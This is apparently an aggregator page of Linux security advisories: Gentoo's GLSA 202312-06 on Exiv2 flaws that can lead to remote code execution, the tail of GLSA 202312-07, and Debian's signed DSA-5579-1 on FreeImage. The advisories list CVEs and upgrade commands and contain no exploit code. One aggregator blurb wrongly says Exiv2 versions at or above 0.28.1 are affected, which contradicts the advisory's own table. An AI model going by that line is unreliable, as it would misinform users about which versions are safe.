[ 40 ] CVE-2023-5857  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5857  
[ 41 ] CVE-2023-5858  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5858  
[ 42 ] CVE-2023-5859  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5859  
[ 43 ] CVE-2023-5996  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5996  
[ 44 ] CVE-2023-5997  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5997  
[ 45 ] CVE-2023-6112  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6112

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-07

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-07

Gentoo Linux Security Advisory 202312-6 - Multiple vulnerabilities have been discovered in Exiv2, the worst of which can lead to remote code execution. Versions greater than or equal to 0.28.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Exiv2: Multiple Vulnerabilities  
     Date: December 22, 2023  
     Bugs: #785646, #807346, #917650  
       ID: 202312-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Exiv2, the worst of  
which can lead to remote code execution.

Background  
=========  
Exiv2 is a C++ library and set of tools for parsing, editing and saving  
Exif and IPTC metadata from images. Exif, the Exchangeable image file  
format, specifies the addition of metadata tags to JPEG, TIFF and RIFF  
files.

Affected packages  
================  
Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
media-gfx/exiv2  < 0.28.1      >= 0.28.1

Description  
==========  
Multiple vulnerabilities have been discovered in Exiv2. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Exiv2 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-gfx/exiv2-0.28.1"

References  
=========  
[ 1 ] CVE-2020-18771  
      https://nvd.nist.gov/vuln/detail/CVE-2020-18771  
[ 2 ] CVE-2020-18773  
      https://nvd.nist.gov/vuln/detail/CVE-2020-18773  
[ 3 ] CVE-2020-18774  
      https://nvd.nist.gov/vuln/detail/CVE-2020-18774  
[ 4 ] CVE-2020-18899  
      https://nvd.nist.gov/vuln/detail/CVE-2020-18899  
[ 5 ] CVE-2021-29457  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29457  
[ 6 ] CVE-2021-29458  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29458  
[ 7 ] CVE-2021-29463  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29463  
[ 8 ] CVE-2021-29464  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29464  
[ 9 ] CVE-2021-29470  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29470  
[ 10 ] CVE-2021-29473  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29473  
[ 11 ] CVE-2021-29623  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29623  
[ 12 ] CVE-2021-31291  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31291  
[ 13 ] CVE-2021-31292  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31292  
[ 14 ] CVE-2021-32617  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32617  
[ 15 ] CVE-2021-32815  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32815  
[ 16 ] CVE-2021-34334  
      https://nvd.nist.gov/vuln/detail/CVE-2021-34334  
[ 17 ] CVE-2021-34335  
      https://nvd.nist.gov/vuln/detail/CVE-2021-34335  
[ 18 ] CVE-2021-37615  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37615  
[ 19 ] CVE-2021-37616  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37616  
[ 20 ] CVE-2021-37618  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37618  
[ 21 ] CVE-2021-37619  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37619  
[ 22 ] CVE-2021-37620  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37620  
[ 23 ] CVE-2021-37621  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37621  
[ 24 ] CVE-2021-37622  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37622  
[ 25 ] CVE-2021-37623  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37623  
[ 26 ] CVE-2023-44398  
      https://nvd.nist.gov/vuln/detail/CVE-2023-44398

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-06

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-06

Debian Linux Security Advisory 5579-1 - Multiple vulnerabilities were discovered in FreeImage, a support library for graphics image formats, which could result in the execution of arbitrary code if malformed image files are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5579-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 17, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : freeimageCVE ID         : CVE-2020-21427 CVE-2020-21428 CVE-2020-22524Multiple vulnerabilities were discovered in FreeImage, a support libraryfor graphics image formats, which could result in the execution ofarbitrary code if malformed image files are processed.For the oldstable distribution (bullseye), these problems have been fixedin version 3.18.0+ds2-6+deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 3.18.0+ds2-9+deb12u1.We recommend that you upgrade your freeimage packages.For the detailed security status of freeimage please refer toits security tracker page at:https://security-tracker.debian.org/tracker/freeimageFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmV/P8AACgkQEMKTtsN8TjZOgw//e8Bv/IaGizwfZv1pgt7WltqB7B/CcwaP4S1ARybOAEShsVvMUojq3oocT8xG37LWJ6POh1w9Ks8mEtmhAcyap0L7oO+xUyBsvIy1Wqa+XK26AVeAtbSNyyr8jIzfD/5B0cT8mhs7d3t1EhuLucB5n3VL2KWU3INRuo0Az7rBxrQO5lzT46dBJueJDX4f5jIEVEbxvLCkox/COz0eQW2S0m+ry6qKnVf8F7lBBMEZQVzQrHI3sV5Eo9vKPGIBlQmf05qm04utwbOxKWCU3Aq+3aVt+5DJ62oGPBS/aLjsi3pN2wSay3kE/xV/CUyV4N5R9NYPFqyPBC8gPgwDg1gOvIEFP1nXKpxWK+JtLRpZDg4Gl5Wmo9aE9Qinw7ajxY/MbtL+U0QsfqL2TKnZs0yVineV6aUffSZ6r64BK2FEVN5ZoRM4G59++8iE45xX2QxM8DklmYc3Utyo2nmmckJNfwRnevTxesDHjxSUPMQe/gGtpFSiXmHK6LoQFxcv5+p8LS6JcRQINNXtcyHnRJt2jFsOKWZ5C84iNSy9tN+wtvR4dIOOSuGcxkmyDeIjFOMKXeYxqfqurWC0ipXJ39agh0Co4kqUXtPClpGg++/zVKZ3fNW6sQ/NVYKmEj2YPY/39EWV894huQiXRkzpykOWIa/54Knpxz60FBID3s/7gU4==zfhY-----END PGP SIGNATURE-----

Tag

#c++